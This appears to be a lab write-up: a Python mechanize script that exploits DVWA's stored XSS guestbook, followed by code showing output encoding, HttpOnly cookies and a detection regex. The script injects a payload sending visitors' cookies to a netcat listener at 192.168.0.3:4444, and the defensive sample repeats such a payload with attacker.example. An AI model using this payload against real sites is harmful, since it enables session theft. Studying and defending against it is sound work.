Stored Cross-site Scripting (XSS) Cookie Stealing with Mechanize and DVWA

Damn Vulnerable Web Application (DVWA) is an intentionally vulnerable web application used for training. DVWA is also one of the web applications on the OWASP Broken Web Applications Virtual Machine. This post is nothing more than a script that automates the exploitation of the stored cross-site scripting vulnerability using Python's mechanize module for browser automation. The script logs into DVWA, sets the security level to "low", injects a cookie-stealing payload into the vulnerable guestbook form, and starts a netcat listener to catch the cookie when a victim's browser loads the page.

#Tested on Windows against DVWA within the OWASP Broken Web App VM Version 1.2
# Usage: python <this script>.py <dvwa_host>  (the DVWA host is taken from the command line)

import mechanize
import sys
import os

uname = "admin"
pword = "admin"
rhost = sys.argv[1]        # IP address or hostname of the DVWA server
br = mechanize.Browser()   # one Browser object keeps the session cookie across all requests

def loginAndReset(username,password):
    """Logs into DVWA and sets security to low"""
    br.open("http://" + rhost + "/dvwa/login.php")
    br.select_form(nr=0)   # the login form is the first form on the page
    br.form['username']= username
    br.form['password']= password
    br.submit() #submit the form

    br.follow_link(url_regex=r'security.php')
    br.select_form(nr=0) #selects the form
    br.form['security'] = ["low"]   # select inputs take a list of chosen values
    br.submit()

def storedXss():
    """Injects the xss payload into the form"""
    br.open("http://" + rhost + "/dvwa/vulnerabilities/xss_s")
    br.select_form(nr=0)
    br.form['txtName']= "Jake"
    # the message is stored server-side and rendered unescaped to every later visitor,
    # whose browser then sends its cookies to the listener started below
    br.form['mtxMessage']= "Really cool stuff! Keep up the good work!<script>document.location='http://192.168.0.3:4444/cgi-bin/grab.cgi?'+document.cookie;</script>"
    br.submit()

def listener():
    """Starts a listener to catch the cookie"""
    # opens a new cmd window running netcat on port 4444 (Windows-specific)
    os.system(r'start cmd.exe /k "nc -nlvp 4444"')


def main():
    loginAndReset(uname, pword)
    storedXss()
    listener()

if __name__ == '__main__':
    main()
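The script above works because the guestbook stores the message and echoes it back to every later visitor without encoding it, and because the session cookie is readable from JavaScript. The following is an added example, not part of the post and not DVWA's code: a hypothetical guestbook renderer in its vulnerable and hardened forms, plus a Set-Cookie builder that adds the HttpOnly flag. The entry data, the attacker.example host and the PHPSESSID cookie name (PHP's default session cookie) are assumptions constructed for the demonstration. Output encoding removes the injection itself; HttpOnly only blocks this particular cookie-theft payload, so it is a second layer rather than the fix.

```python
import html
import re

# Constructed guestbook entry in the shape the post's script submits
# (txtName / mtxMessage); the host is a placeholder, not the post's listener.
ENTRY = {
    "name": "Jake",
    "message": ("Really cool stuff! Keep up the good work!"
                "<script>document.location='http://attacker.example/?'"
                "+document.cookie</script>"),
}

# Matches a script tag or an inline event handler attribute (onerror=, onload=, ...)
_ACTIVE_CONTENT = re.compile(r"<\s*script|\bon\w+\s*=", re.IGNORECASE)


def render_vulnerable(entry):
    """Mirror of the 'low' security behaviour: user input is concatenated into
    the page as-is, so a stored <script> runs in every visitor's browser."""
    return ("<div class=\"guestbook-entry\">Name: " + entry["name"] +
            "<br />Message: " + entry["message"] + "</div>")


def render_hardened(entry):
    """Contextual output encoding for HTML body: every user-controlled value
    is escaped (&, <, >, \", ') so the browser treats it as text, not markup."""
    return ("<div class=\"guestbook-entry\">Name: " + html.escape(entry["name"]) +
            "<br />Message: " + html.escape(entry["message"]) + "</div>")


def contains_active_content(rendered_html):
    """Detection helper: True if the rendered page still carries executable markup."""
    return _ACTIVE_CONTENT.search(rendered_html) is not None


def session_cookie_header(session_id, secure=True):
    """Build a Set-Cookie header with HttpOnly so document.cookie cannot read it;
    SameSite and Secure are added as the usual companions."""
    attrs = ["Path=/", "HttpOnly", "SameSite=Lax"]
    if secure:
        attrs.append("Secure")
    return "Set-Cookie: PHPSESSID=%s; %s" % (session_id, "; ".join(attrs))


def cookie_readable_by_script(set_cookie_header):
    """True if a script in the page could read this cookie (no HttpOnly flag)."""
    attrs = [a.strip().lower() for a in set_cookie_header.split(";")[1:]]
    return "httponly" not in attrs


if __name__ == "__main__":
    print("vulnerable :", render_vulnerable(ENTRY))
    print("hardened   :", render_hardened(ENTRY))
    print("legacy cookie readable:",
          cookie_readable_by_script("Set-Cookie: PHPSESSID=abc; Path=/"))
    print("hardened cookie readable:",
          cookie_readable_by_script(session_cookie_header("abc")))
```

Running it shows the stored payload surviving intact in the vulnerable render and appearing as inert `&lt;script&gt;` text in the hardened one; the same `contains_active_content` check can be pointed at a saved copy of a page as a quick regression test after a fix.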
